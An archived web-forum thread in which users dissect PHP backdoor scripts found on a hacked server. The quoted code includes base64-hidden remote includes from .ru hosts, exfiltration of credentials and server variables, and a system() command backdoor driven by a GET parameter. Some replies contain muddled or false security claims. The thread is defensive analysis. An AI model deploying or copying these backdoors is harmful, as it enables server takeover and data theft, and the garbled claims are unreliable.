Jump to content

Archived

This topic is now archived and is closed to further replies.

joecooper

just need to know what this code does...

Recommended Posts

can someone in detail explain what exactly this code does? thanks. i good with php but this looks complex to me!

[code]<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>[/code]

Share this post


Link to post
Share on other sites
name
password
url


<?php
error_reporting(0);// error reporting off

if(isset($_POST["l"]) and isset($_POST["p"])){ // post name and password

if(isset($_POST["input"])){$user_auth="&l=".
base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
// post name and password encode them.


else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}//post name and password encoded


if(!isset($_POST["log_flg"])){$log_flg="&log";}
// if name and password exiat encoded


if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
// decode the name password and the url via ip


{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
//get name and password if active and post information
?>

Share this post


Link to post
Share on other sites
did you get hacked joe?

cause this looks like part of the authentication for a hacking script...it sends info to a russian site to verify the username and password, and if it returns a certain value, executes some system commands.

Share this post


Link to post
Share on other sites
i didnt get hacked, but someone i know has. and that was the scipt that was uploaded


i see now. i decoded the base64 code and it returned

http://bis.iframe.ru/master.php?r_addr=

Share this post


Link to post
Share on other sites
I have a friend get hacked as well over the past week.  He ended up with a hacker script that opens up a huge backdoor...luckily the hacker wasn't smart and named it something very obvious, so he was able to quickly pick it out from all his other scripts.

Share this post


Link to post
Share on other sites
how about this code that was also uploaded

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

Share this post


Link to post
Share on other sites
ip.
88.151.116.6

company url
http://ns0.ru/

the above code seems to be able to get and add database information to another database ok.

Share this post


Link to post
Share on other sites
Same type thing, but this time it sends all of your server information:
[code]
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
[/code]
to a server somewhere...if the first one fails, it goes to a second.

Share this post


Link to post
Share on other sites
how can a php script open a back door tho? it cant exactly edit files unless they are chmod 777... and not many people have many folders set as chmodd

Share this post


Link to post
Share on other sites
once the script is on your server it can do a chmod on them just like you can.  I set up a VM and ran the script that was left on my friends server...I was able to see the entire directory structure...the hd, the cd drive, the floppy drive...I could execute command line scripts and such...I could manipulate any of the files on the server I wanted.

In his particular case there is a security hole in one of the earlier versions of the smf bridge for joomla that the hacker exploited. 

Share this post


Link to post
Share on other sites
most hackers can upload a code that is also in a photo then the code posts information back to the hacker.

The hacker is only intrested in the open ports to meachines hanging off the server for example a credit card server.

there are thousands of tolls and thosands of holes in computer programs i know for a fact that large well known companys out there have got vanable hotspots on operating systems to get into all meachines linked to the net.

in reel reality there is no such thing as secuity as were like to know it, there will always be back doors to all programs as computer developers use hackers there self for development fact.

Share this post


Link to post
Share on other sites
how do you mean by they can upload code in a photo. do you mean they have a .php file labled as a .jpg.... because the server wouldnt parse this as a phpfile, would only output the code to the user

Share this post


Link to post
Share on other sites
.gif files can contain executable code.

EDIT:  Not php, but other languages...not sure which...never looked into it.

Share this post


Link to post
Share on other sites
the most powerfull hackers that are around are the ones involved in unixs thats why linux is a cut down version.

unix programing with meachine code is like owning a bank lol........................

Share this post


Link to post
Share on other sites
[quote]the most powerfull hackers that are around are the ones involved in unixs thats why linux is a cut down version.[/quote]
What are you babling about?

Share this post


Link to post
Share on other sites

×

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.